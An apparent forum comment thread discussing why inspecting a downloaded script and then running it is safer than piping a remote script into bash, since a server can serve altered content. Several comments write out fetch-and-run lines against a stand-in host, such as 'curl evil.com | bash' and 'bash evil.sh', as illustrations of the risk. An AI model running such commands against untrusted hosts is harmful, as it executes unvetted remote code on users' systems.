Comment by nerdponx 7 years ago If you downloaded the script to inspect it, why would you not just run the script that you downloaded? 6 comments nerdponx Reply tutfbhuf 7 years ago That's the point. It's also possible that the remote script has been altered in the meantime. Therefore it's never advisable to download the script again after inspection. chmod775 7 years ago curl evil.com curl evil.com | bash nerdponx 7 years ago wget evil.com less evil.sh bash evil.sh IshKebab 7 years ago There's more than one user. You don't want any of them to find the malicious code. jchw 7 years ago Web browser.
tutfbhuf 7 years ago That's the point. It's also possible that the remote script has been altered in the meantime. Therefore it's never advisable to download the script again after inspection.
chmod775 7 years ago curl evil.com curl evil.com | bash nerdponx 7 years ago wget evil.com less evil.sh bash evil.sh
IshKebab 7 years ago There's more than one user. You don't want any of them to find the malicious code.
That's the point. It's also possible that the remote script has been altered in the meantime. Therefore it's never advisable to download the script again after inspection.
There's more than one user. You don't want any of them to find the malicious code.
Web browser.